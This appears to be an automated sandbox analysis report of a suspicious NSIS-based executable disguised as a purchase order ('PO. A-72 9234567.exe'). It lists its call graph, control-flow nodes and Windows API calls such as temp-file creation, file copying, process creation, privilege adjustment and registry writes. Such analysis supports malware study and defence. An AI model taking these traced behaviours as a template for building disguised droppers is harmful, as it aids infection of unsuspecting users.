40351c SetErrorMode GetVersionExW 3669 403570 GetVersionExW 3668->3669 3670 4035a8 3668->3670 3669->3670 3671 4035ff 3670->3671 3672 406935 5 API calls 3670->3672 3673 4068c5 3 API calls 3671->3673 3672->3671 3674 403615 lstrlenA 3673->3674 3674->3671 3675 403625 3674->3675 3676 406935 5 API calls 3675->3676 3677 40362c 3676->3677 3678 406935 5 API calls 3677->3678 3679 403633 3678->3679 3680 406935 5 API calls 3679->3680 3681 40363f #17 OleInitialize SHGetFileInfoW 3680->3681 3756 406541 lstrcpynW 3681->3756 3684 40368e GetCommandLineW 3757 406541 lstrcpynW 3684->3757 3686 4036a0 3687 405e3d CharNextW 3686->3687 3688 4036c6 CharNextW 3687->3688 3696 4036d8 3688->3696 3689 4037da 3690 4037ee GetTempPathW 3689->3690 3758 4034eb 3690->3758 3692 403806 3693 403860 DeleteFileW 3692->3693 3694 40380a GetWindowsDirectoryW lstrcatW 3692->3694 3768 4030a2 GetTickCount GetModuleFileNameW 3693->3768 3697 4034eb 12 API calls 3694->3697 3695 405e3d CharNextW 3695->3696 3696->3689 3696->3695 3702 4037dc 3696->3702 3699 403826 3697->3699 3699->3693 3701 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3699->3701 3700 403874 3703 40392b 3700->3703 3706 40391b 3700->3706 3710 405e3d CharNextW 3700->3710 3704 4034eb 12 API calls 3701->3704 3852 406541 lstrcpynW 3702->3852 3911 403b39 3703->3911 3708 403858 3704->3708 3796 403c13 3706->3796 3708->3693 3708->3703 3723 403893 3710->3723 3712 403a79 3716 405ba1 MessageBoxIndirectW 3712->3716 3713 403a9d 3714 403b21 ExitProcess 3713->3714 3715 403aa5 GetCurrentProcess OpenProcessToken 3713->3715 3717 403af1 3715->3717 3718 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3715->3718 3722 403a87 ExitProcess 3716->3722 3725 406935 5 API calls 3717->3725 3718->3717 3719 4038f1 3853 405f18 3719->3853 3720 403934 3724 405b0c 5 API calls 3720->3724 3723->3719 3723->3720 3727 403939 lstrlenW 3724->3727 3728 403af8 3725->3728 3869 406541 lstrcpynW 3727->3869 3731 403b0d ExitWindowsEx 3728->3731 3733 403b1a 3728->3733 3731->3714 3731->3733 3732 403953 3735 40395c 3732->3735 3753 40396b 3732->3753 3736 40140b 2 API calls 3733->3736 3870 406541 lstrcpynW 3735->3870 3736->3714 3737 403910 3868 406541 lstrcpynW 3737->3868 3740 403991 wsprintfW 3741 40657e 21 API calls 3740->3741 3741->3753 3742 405aef 2 API calls 3742->3753 3743 405a95 2 API calls 3743->3753 3744 403a07 SetCurrentDirectoryW 3907 406301 MoveFileExW 3744->3907 3745 4039cd GetFileAttributesW 3746 4039d9 DeleteFileW 3745->3746 3745->3753 3746->3753 3750 406301 40 API calls 3750->3753 3751 40657e 21 API calls 3751->3753 3752 405b24 2 API calls 3752->3753 3753->3703 3753->3740 3753->3742 3753->3743 3753->3744 3753->3745 3753->3750 3753->3751 3753->3752 3754 403a8f CloseHandle 3753->3754 3755 40689e 2 API calls 3753->3755 3871 405c4d 3753->3871 3754->3703 3755->3753 3756->3684 3757->3686 3759 4067ef 5 API calls 3758->3759 3760 4034f7 3759->3760 3761 403501 3760->3761 3762 405e10 3 API calls 3760->3762 3761->3692 3763 403509 3762->3763 3764 405aef 2 API calls 3763->3764 3765 40350f 3764->3765 3918 406060 3765->3918 3922 406031 GetFileAttributesW CreateFileW 3768->3922 3770 4030e2 3791 4030f2 3770->3791 3923 406541 lstrcpynW 3770->3923 3772 403108 3924 405e5c lstrlenW 3772->3924 3776 403119 GetFileSize 3777 403213 3776->3777 3789 403130 3776->3789 3929 40303e 3777->3929 3779 40321c 3781 40324c GlobalAlloc 3779->3781 3779->3791 3941 4034d4 SetFilePointer 3779->3941 3780 4034be ReadFile 3780->3789 3940 4034d4 SetFilePointer 3781->3940 3783 40327f 3787 40303e 6 API calls 3783->3787 3785 403235 3788 4034be ReadFile 3785->3788 3786 403267 3790 4032d9 39 API calls 3786->3790 3787->3791 3792 403240 3788->3792 3789->3777 3789->3780 3789->3783 3789->3791 3793 40303e 6 API calls 3789->3793 3794 403273 3790->3794 3791->3700 3792->3781 3792->3791 3793->3789 3794->3791 3794->3794 3795 4032b0 SetFilePointer 3794->3795 3795->3791 3797 406935 5 API calls 3796->3797 3798 403c27 3797->3798 3799 403c2d 3798->3799 3800 403c3f 3798->3800 3950 406488 wsprintfW 3799->3950 3801 40640f 3 API calls 3800->3801 3802 403c6f 3801->3802 3804 403c8e lstrcatW 3802->3804 3806 40640f 3 API calls 3802->3806 3805 403c3d 3804->3805 3942 403ee9 3805->3942 3806->3804 3809 405f18 18 API calls 3810 403cc0 3809->3810 3811 403d54 3810->3811 3813 40640f 3 API calls 3810->3813 3812 405f18 18 API calls 3811->3812 3814 403d5a 3812->3814 3815 403cf2 3813->3815 3816 403d6a LoadImageW 3814->3816 3817 40657e 21 API calls 3814->3817 3815->3811 3820 403d13 lstrlenW 3815->3820 3824 405e3d CharNextW 3815->3824 3818 403e10 3816->3818 3819 403d91 RegisterClassW 3816->3819 3817->3816 3822 40140b 2 API calls 3818->3822 3821 403dc7 SystemParametersInfoW CreateWindowExW 3819->3821 3851 403e1a 3819->3851 3825 403d21 lstrcmpiW 3820->3825 3826 403d47 3820->3826 3821->3818 3823 403e16 3822->3823 3830 403ee9 22 API calls 3823->3830 3823->3851 3828 403d10 3824->3828 3825->3826 3829 403d31 GetFileAttributesW 3825->3829 3827 405e10 3 API calls 3826->3827 3831 403d4d 3827->3831 3828->3820 3832 403d3d 3829->3832 3834 403e27 3830->3834 3951 406541 lstrcpynW 3831->3951 3832->3826 3833 405e5c 2 API calls 3832->3833 3833->3826 3836 403e33 ShowWindow 3834->3836 3837 403eb6 3834->3837 3839 4068c5 3 API calls 3836->3839 3838 405699 5 API calls 3837->3838 3840 403ebc 3838->3840 3841 403e4b 3839->3841 3842 403ec0 3840->3842 3843 403ed8 3840->3843 3844 403e59 GetClassInfoW 3841->3844 3846 4068c5 3 API calls 3841->3846 3849 40140b 2 API calls 3842->3849 3842->3851 3845 40140b 2 API calls 3843->3845 3847 403e83 DialogBoxParamW 3844->3847 3848 403e6d GetClassInfoW RegisterClassW 3844->3848 3845->3851 3846->3844 3850 40140b 2 API calls 3847->3850 3848->3847 3849->3851 3850->3851 3851->3703 3852->3690 3953 406541 lstrcpynW 3853->3953 3855 405f29 3856 405ebb 4 API calls 3855->3856 3857 405f2f 3856->3857 3858 4038fd 3857->3858 3859 4067ef 5 API calls 3857->3859 3858->3703 3867 406541 lstrcpynW 3858->3867 3865 405f3f 3859->3865 3860 405f70 lstrlenW 3861 405f7b 3860->3861 3860->3865 3862 405e10 3 API calls 3861->3862 3864 405f80 GetFileAttributesW 3862->3864 3863 40689e 2 API calls 3863->3865 3864->3858 3865->3858 3865->3860 3865->3863 3866 405e5c 2 API calls 3865->3866 3866->3860 3867->3737 3868->3706 3869->3732 3870->3753 3872 405f18 18 API calls 3871->3872 3873 405c6d 3872->3873 3874 405c75 DeleteFileW 3873->3874 3875 405c8c 3873->3875 3876 405dc3 3874->3876 3878 405dac 3875->3878 3954 406541 lstrcpynW 3875->3954 3876->3753 3878->3876 3884 40689e 2 API calls 3878->3884 3879 405cb2 3880 405cc5 3879->3880 3881 405cb8 lstrcatW 3879->3881 3883 405e5c 2 API calls 3880->3883 3882 405ccb 3881->3882 3885 405cdb lstrcatW 3882->3885 3887 405ce6 lstrlenW FindFirstFileW 3882->3887 3883->3882 3886 405dd1 3884->3886 3885->3887 3886->3876 3888 405e10 3 API calls 3886->3888 3887->3878 3905 405d08 3887->3905 3889 405ddb 3888->3889 3891 405c05 5 API calls 3889->3891 3890 405d8f FindNextFileW 3893 405da5 FindClose 3890->3893 3890->3905 3894 405de7 3891->3894 3893->3878 3895 405e01 3894->3895 3896 405deb 3894->3896 3898 4055c6 28 API calls 3895->3898 3896->3876 3899 4055c6 28 API calls 3896->3899 3898->3876 3901 405df8 3899->3901 3900 405c4d 64 API calls 3900->3905 3902 406301 40 API calls 3901->3902 3902->3876 3903 4055c6 28 API calls 3903->3890 3904 4055c6 28 API calls 3904->3905 3905->3890 3905->3900 3905->3903 3905->3904 3906 406301 40 API calls 3905->3906 3955 406541 lstrcpynW 3905->3955 3956 405c05 3905->3956 3906->3905 3908 403a16 CopyFileW 3907->3908 3909 406315 3907->3909 3908->3703 3908->3753 3964 406187 3909->3964 3912 403b51 3911->3912 3913 403b43 CloseHandle 3911->3913 3998 403b7e 3912->3998 3913->3912 3916 405c4d 71 API calls 3917 403a6c OleUninitialize 3916->3917 3917->3712 3917->3713 3919 40606d GetTickCount GetTempFileNameW 3918->3919 3920 40351a 3919->3920 3921 4060a3 3919->3921 3920->3692 3921->3919 3921->3920 3922->3770 3923->3772 3925 405e6a 3924->3925 3926 405e70 CharPrevW 3925->3926 3927 40310e 3925->3927 3926->3925 3926->3927 3928 406541 lstrcpynW 3927->3928 3928->3776 3930 403047 3929->3930 3931 40305f 3929->3931 3932 403050 DestroyWindow 3930->3932 3933 403057 3930->3933 3934 403067 3931->3934 3935 40306f GetTickCount 3931->3935 3932->3933 3933->3779 3936 406971 2 API calls 3934->3936 3937 4030a0 3935->3937 3938 40307d CreateDialogParamW ShowWindow 3935->3938 3939 40306d 3936->3939 3937->3779 3938->3937 3939->3779 3940->3786 3941->3785 3943 403efd 3942->3943 3952 406488 wsprintfW 3943->3952 3945 403f6e 3946 403fa2 22 API calls 3945->3946 3948 403f73 3946->3948 3947 403c9e 3947->3809 3948->3947 3949 40657e 21 API calls 3948->3949 3949->3948 3950->3805 3951->3811 3952->3945 3953->3855 3954->3879 3955->3905 3957 40600c 2 API calls 3956->3957 3958 405c11 3957->3958 3959 405c32 3958->3959 3960 405c20 RemoveDirectoryW 3958->3960 3961 405c28 DeleteFileW 3958->3961 3959->3905 3962 405c2e 3960->3962 3961->3962 3962->3959 3963 405c3e SetFileAttributesW 3962->3963 3963->3959 3965 4061b7 3964->3965 3966 4061dd GetShortPathNameW 3964->3966 3991 406031 GetFileAttributesW CreateFileW 3965->3991 3968 4061f2 3966->3968 3969 4062fc 3966->3969 3968->3969 3971 4061fa wsprintfA 3968->3971 3969->3908 3970 4061c1 CloseHandle GetShortPathNameW 3970->3969 3972 4061d5 3970->3972 3973 40657e 21 API calls 3971->3973 3972->3966 3972->3969 3974 406222 3973->3974 3992 406031 GetFileAttributesW CreateFileW 3974->3992 3976 40622f 3976->3969 3977 40623e GetFileSize GlobalAlloc 3976->3977 3978 406260 3977->3978 3979 4062f5 CloseHandle 3977->3979 3980 4060b4 ReadFile 3978->3980 3979->3969 3981 406268 3980->3981 3981->3979 3993 405f96 lstrlenA 3981->3993 3984 406293 3986 405f96 4 API calls 3984->3986 3985 40627f lstrcpyA 3987 4062a1 3985->3987 3986->3987 3988 4062d8 SetFilePointer 3987->3988 3989 4060e3 WriteFile 3988->3989 3990 4062ee GlobalFree 3989->3990 3990->3979 3991->3970 3992->3976 3994 405fd7 lstrlenA 3993->3994 3995 405fb0 lstrcmpiA 3994->3995 3996 405fdf 3994->3996 3995->3996 3997 405fce CharNextA 3995->3997 3996->3984 3996->3985 3997->3994 3999 403b8c 3998->3999 4000 403b56 3999->4000 4001 403b91 FreeLibrary GlobalFree 3999->4001 4000->3916 4001->4000 4001->4001 4552 401b9c 4553 402dcb 21 API calls 4552->4553 4554 401ba3 4553->4554 4555 402da9 21 API calls 4554->4555 4556 401bac wsprintfW 4555->4556 4557 402c4f 4556->4557 4558 40149e 4559 4023c2 4558->4559 4560 4014ac PostQuitMessage 4558->4560 4560->4559 4561 4016a0 4562 402dcb 21 API calls 4561->4562 4563 4016a7 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b0 4564->4565 4566 402dcb 21 API calls 4565->4566 4567 4016b9 MoveFileW 4566->4567 4568 4016cc 4567->4568 4574 4016c5 4567->4574 4569 40231b 4568->4569 4570 40689e 2 API calls 4568->4570 4572 4016db 4570->4572 4571 401423 28 API calls 4571->4569 4572->4569 4573 406301 40 API calls 4572->4573 4573->4574 4574->4571 4575 401a24 4576 402dcb 21 API calls 4575->4576 4577 401a2b 4576->4577 4578 402dcb 21 API calls 4577->4578 4579 401a34 4578->4579 4580 401a3b lstrcmpiW 4579->4580 4581 401a4d lstrcmpW 4579->4581 4582 401a41 4580->4582 4581->4582 4583 402324 4584 402dcb 21 API calls 4583->4584 4585 40232a 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 402333 4586->4587 4588 402dcb 21 API calls 4587->4588 4589 40233c 4588->4589 4590 40689e 2 API calls 4589->4590 4591 402345 4590->4591 4592 402356 lstrlenW lstrlenW 4591->4592 4593 402349 4591->4593 4595 4055c6 28 API calls 4592->4595 4594 4055c6 28 API calls 4593->4594 4596 402351 4593->4596 4594->4596 4597 402394 SHFileOperationW 4595->4597 4597->4593 4597->4596 4598 401da6 4599 401db9 GetDlgItem 4598->4599 4600 401dac 4598->4600 4602 401db3 4599->4602 4601 402da9 21 API calls 4600->4601 4601->4602 4603 401dfa GetClientRect LoadImageW SendMessageW 4602->4603 4604 402dcb 21 API calls 4602->4604 4606 401e58 4603->4606 4608 401e64 4603->4608 4604->4603 4607 401e5d DeleteObject 4606->4607 4606->4608 4607->4608 4609 4023a8 4610 4023af 4609->4610 4612 4023c2 4609->4612 4611 40657e 21 API calls 4610->4611 4613 4023bc 4611->4613 4614 405ba1 MessageBoxIndirectW 4613->4614 4614->4612 4615 402c2a SendMessageW 4616 402c44 InvalidateRect 4615->4616 4617 402c4f 4615->4617 4616->4617 4625 404f2d GetDlgItem GetDlgItem 4626 4051a4 4625->4626 4627 404f7f 7 API calls 4625->4627 4631 405286 4626->4631 4659 405213 4626->4659 4679 404e7b SendMessageW 4626->4679 4628 405026 DeleteObject 4627->4628 4629 405019 SendMessageW 4627->4629 4630 40502f 4628->4630 4629->4628 4632 405066 4630->4632 4633 40657e 21 API calls 4630->4633 4635 405332 4631->4635 4640 405197 4631->4640 4645 4052df SendMessageW 4631->4645 4634 4044c0 22 API calls 4632->4634 4638 405048 SendMessageW SendMessageW 4633->4638 4639 40507a 4634->4639 4636 405344 4635->4636 4637 40533c SendMessageW 4635->4637 4647 405356 ImageList_Destroy 4636->4647 4648 40535d 4636->4648 4656 40536d 4636->4656 4637->4636 4638->4630 4644 4044c0 22 API calls 4639->4644 4642 404527 8 API calls 4640->4642 4641 405278 SendMessageW 4641->4631 4646 405533 4642->4646 4660 40508b 4644->4660 4645->4640 4650 4052f4 SendMessageW 4645->4650 4647->4648 4651 405366 GlobalFree 4648->4651 4648->4656 4649 4054e7 4649->4640 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4649->4654 4653 405307 4650->4653 4651->4656 4652 405166 GetWindowLongW SetWindowLongW 4655 40517f 4652->4655 4662 405318 SendMessageW 4653->4662 4654->4640 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4649 4672 4053a8 4656->4672 4684 404efb 4656->4684 4677 4044f5 SendMessageW 4657->4677 4678 4044f5 SendMessageW 4658->4678 4659->4631 4659->4641 4660->4652 4661 4050de SendMessageW 4660->4661 4663 405161 4660->4663 4666 405130 SendMessageW 4660->4666 4667 40511c SendMessageW 4660->4667 4661->4660 4662->4635 4663->4652 4663->4655 4666->4660 4667->4660 4669 4054b2 4670 4054bd InvalidateRect 4669->4670 4673 4054c9 4669->4673 4670->4673 4671 4053d6 SendMessageW 4676 4053ec 4671->4676 4672->4671 4672->4676 4673->4649 4693 404e36 4673->4693 4675 405460 SendMessageW SendMessageW 4675->4676 4676->4669 4676->4675 4677->4640 4678->4626 4680 404eda SendMessageW 4679->4680 4681 404e9e GetMessagePos ScreenToClient SendMessageW 4679->4681 4682 404ed2 4680->4682 4681->4682 4683 404ed7 4681->4683 4682->4659 4683->4680 4696 406541 lstrcpynW 4684->4696 4686 404f0e 4697 406488 wsprintfW 4686->4697 4688 404f18 4689 40140b 2 API calls 4688->4689 4690 404f21 4689->4690 4698 406541 lstrcpynW 4690->4698 4692 404f28 4692->4672 4699 404d6d 4693->4699 4695 404e4b 4695->4649 4696->4686 4697->4688 4698->4692 4702 404d86 4699->4702 4700 40657e 21 API calls 4701 404dea 4700->4701 4703 40657e 21 API calls 4701->4703 4702->4700 4704 404df5 4703->4704 4705 40657e 21 API calls 4704->4705 4706 404e0b lstrlenW wsprintfW SetDlgItemTextW 4705->4706 4706->4695 4002 4024af 4003 402dcb 21 API calls 4002->4003 4004 4024c1 4003->4004 4005 402dcb 21 API calls 4004->4005 4006 4024cb 4005->4006 4019 402e5b 4006->4019 4009 402953 4010 402503 4012 40250f 4010->4012 4014 402da9 21 API calls 4010->4014 4011 402dcb 21 API calls 4013 4024f9 lstrlenW 4011->4013 4015 40252e RegSetValueExW 4012->4015 4016 4032d9 39 API calls 4012->4016 4013->4010 4014->4012 4017 402544 RegCloseKey 4015->4017 4016->4015 4017->4009 4020 402e76 4019->4020 4023 4063dc 4020->4023 4024 4063eb 4023->4024 4025 4024db 4024->4025 4026 4063f6 RegCreateKeyExW 4024->4026 4025->4009 4025->4010 4025->4011 4026->4025 4707 404630 lstrlenW 4708 404651 WideCharToMultiByte 4707->4708 4709 40464f 4707->4709 4709->4708 4710 402930 4711 402dcb 21 API calls 4710->4711 4712 402937 FindFirstFileW 4711->4712 4713 40295f 4712->4713 4717 40294a 4712->4717 4714 402968 4713->4714 4718 406488 wsprintfW 4713->4718 4719 406541 lstrcpynW 4714->4719 4718->4714 4719->4717 4720 401931 4721 401968 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 40196d 4722->4723 4724 405c4d 71 API calls 4723->4724 4725 401976 4724->4725 4726 4049b1 4727 4049dd 4726->4727 4728 4049ee 4726->4728 4787 405b85 GetDlgItemTextW 4727->4787 4730 4049fa GetDlgItem 4728->4730 4736 404a59 4728->4736 4733 404a0e 4730->4733 4731 404b3d 4735 404cec 4731->4735 4789 405b85 GetDlgItemTextW 4731->4789 4732 4049e8 4734 4067ef 5 API calls 4732->4734 4738 404a22 SetWindowTextW 4733->4738 4739 405ebb 4 API calls 4733->4739 4734->4728 4743 404527 8 API calls 4735->4743 4736->4731 4736->4735 4740 40657e 21 API calls 4736->4740 4742 4044c0 22 API calls 4738->4742 4744 404a18 4739->4744 4745 404acd SHBrowseForFolderW 4740->4745 4741 404b6d 4746 405f18 18 API calls 4741->4746 4747 404a3e 4742->4747 4748 404d00 4743->4748 4744->4738 4752 405e10 3 API calls 4744->4752 4745->4731 4749 404ae5 CoTaskMemFree 4745->4749 4750 404b73 4746->4750 4751 4044c0 22 API calls 4747->4751 4753 405e10 3 API calls 4749->4753 4790 406541 lstrcpynW 4750->4790 4754 404a4c 4751->4754 4752->4738 4755 404af2 4753->4755 4788 4044f5 SendMessageW 4754->4788 4758 404b29 SetDlgItemTextW 4755->4758 4763 40657e 21 API calls 4755->4763 4758->4731 4759 404a52 4761 406935 5 API calls 4759->4761 4760 404b8a 4762 406935 5 API calls 4760->4762 4761->4736 4769 404b91 4762->4769 4764 404b11 lstrcmpiW 4763->4764 4764->4758 4767 404b22 lstrcatW 4764->4767 4765 404bd2 4791 406541 lstrcpynW 4765->4791 4767->4758 4768 404bd9 4770 405ebb 4 API calls 4768->4770 4769->4765 4773 405e5c 2 API calls 4769->4773 4775 404c2a 4769->4775 4771 404bdf GetDiskFreeSpaceW 4770->4771 4774 404c03 MulDiv 4771->4774 4771->4775 4773->4769 4774->4775 4776 404c9b 4775->4776 4778 404e36 24 API calls 4775->4778 4777 404cbe 4776->4777 4779 40140b 2 API calls 4776->4779 4792 4044e2 KiUserCallbackDispatcher 4777->4792 4780 404c88 4778->4780 4779->4777 4782 404c9d SetDlgItemTextW 4780->4782 4783 404c8d 4780->4783 4782->4776 4785 404d6d 24 API calls 4783->4785 4784 404cda 4784->4735 4786 40490a SendMessageW 4784->4786 4785->4776 4786->4735 4787->4732 4788->4759 4789->4741 4790->4760 4791->4768 4792->4784 4793 401934 4794 402dcb 21 API calls 4793->4794 4795 40193b 4794->4795 4796 405ba1 MessageBoxIndirectW 4795->4796 4797 401944 4796->4797 4798 4028b6 4799 4028bd 4798->4799 4801 402bce 4798->4801 4800 402da9 21 API calls 4799->4800 4802 4028c4 4800->4802 4803 4028d3 SetFilePointer 4802->4803 4803->4801 4804 4028e3 4803->4804 4806 406488 wsprintfW 4804->4806 4806->4801 4807 401f37 4808 402dcb 21 API calls 4807->4808 4809 401f3d 4808->4809 4810 402dcb 21 API calls 4809->4810 4811 401f46 4810->4811 4812 402dcb 21 API calls 4811->4812 4813 401f4f 4812->4813 4814 402dcb 21 API calls 4813->4814 4815 401f58 4814->4815 4816 401423 28 API calls 4815->4816 4817 401f5f 4816->4817 4824 405b67 ShellExecuteExW 4817->4824 4819 401fa7 4820 402953 4819->4820 4821 4069e0 5 API calls 4819->4821 4822 401fc4 CloseHandle 4821->4822 4822->4820 4824->4819 4825 402fb8 4826 402fe3 4825->4826 4827 402fca SetTimer 4825->4827 4828 403038 4826->4828 4829 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4826->4829 4827->4826 4829->4828 4830 4014b8 4831 4014be 4830->4831 4832 401389 2 API calls 4831->4832 4833 4014c6 4832->4833 4834 40553a 4835 40554a 4834->4835 4836 40555e 4834->4836 4838 405550 4835->4838 4839 4055a7 4835->4839 4837 405566 IsWindowVisible 4836->4837 4845 40557d 4836->4845 4837->4839 4841 405573 4837->4841 4840 40450c SendMessageW 4838->4840 4842 4055ac CallWindowProcW 4839->4842 4843 40555a 4840->4843 4844 404e7b 5 API calls 4841->4844 4842->4843 4844->4845 4845->4842 4846 404efb 4 API calls 4845->4846 4846->4839 4847 401d3c 4848 402da9 21 API calls 4847->4848 4849 401d42 IsWindow 4848->4849 4850 401a45 4849->4850

                                                Executed Functions

                                                Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 12 403603 5->12 7 40360f-403623 call 4068c5 lstrlenA 6->7 13 403625-403641 call 406935 * 3 7->13 12->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 26 40364b 21->26 26->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 39 4036f0-4036f5 36->39 40 4036f6-4036fa 36->40 44 403860-40387a DeleteFileW call 4030a2 37->44 45 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->45 39->40 42 403700-403706 40->42 43 4037bb-4037ca call 405e3d 40->43 47 403720-403759 42->47 48 403708-40370f 42->48 43->32 61 4037cc-4037cd 43->61 66 403880-403886 44->66 67 403a67-403a77 call 403b39 OleUninitialize 44->67 45->44 64 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 45->64 49 403776-4037b0 47->49 50 40375b-403760 47->50 54 403711-403714 48->54 55 403716 48->55 58 4037b2-4037b6 49->58 59 4037b8-4037ba 49->59 50->49 56 403762-40376a 50->56 54->47 54->55 55->47 62 403771 56->62 63 40376c-40376f 56->63 58->59 65 4037dc-4037e9 call 406541 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 40388c-403897 call 405e3d 66->70 71 40391f-403926 call 403c13 66->71 78 403a79-403a89 call 405ba1 ExitProcess 67->78 79 403a9d-403aa3 67->79 81 4038e5-4038ef 70->81 82 403899-4038ce 70->82 77 40392b-40392f 71->77 77->67 83 403b21-403b29 79->83 84 403aa5-403abb GetCurrentProcess OpenProcessToken 79->84 89 4038f1-4038ff call 405f18 81->89 90 403934-40395a call 405b0c lstrlenW call 406541 81->90 86 4038d0-4038d4 82->86 91 403b2b 83->91 92 403b2f-403b33 ExitProcess 83->92 87 403af1-403aff call 406935 84->87 88 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 84->88 94 4038d6-4038db 86->94 95 4038dd-4038e1 86->95 104 403b01-403b0b 87->104 105 403b0d-403b18 ExitWindowsEx 87->105 88->87 89->67 106 403905-40391b call 406541 * 2 89->106 110 40396b-403983 90->110 111 40395c-403966 call 406541 90->111 91->92 94->95 99 4038e3 94->99 95->86 95->99 99->81 104->105 108 403b1a-403b1c call 40140b 104->108 105->83 105->108 106->71 108->83 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 126 4039c9-4039cb 122->126 123->126 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 126->128 129 4039cd-4039d7 GetFileAttributesW 126->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 130 4039f8-403a03 129->130 131 4039d9-4039e2 DeleteFileW 129->131 130->116 134 403a05 130->134 131->130 133 4039e4-4039f6 call 405c4d 131->133 133->118 133->130 134->67 137->67 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040353F
                                                • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                • OleInitialize.OLE32(00000000), ref: 0040365A
                                                • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO. A-72 9234567.exe",00000020,"C:\Users\user\Desktop\PO. A-72 9234567.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO. A-72 9234567.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                • wsprintfW.USER32 ref: 0040399B
                                                • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                  • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                  • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                  • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                  • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
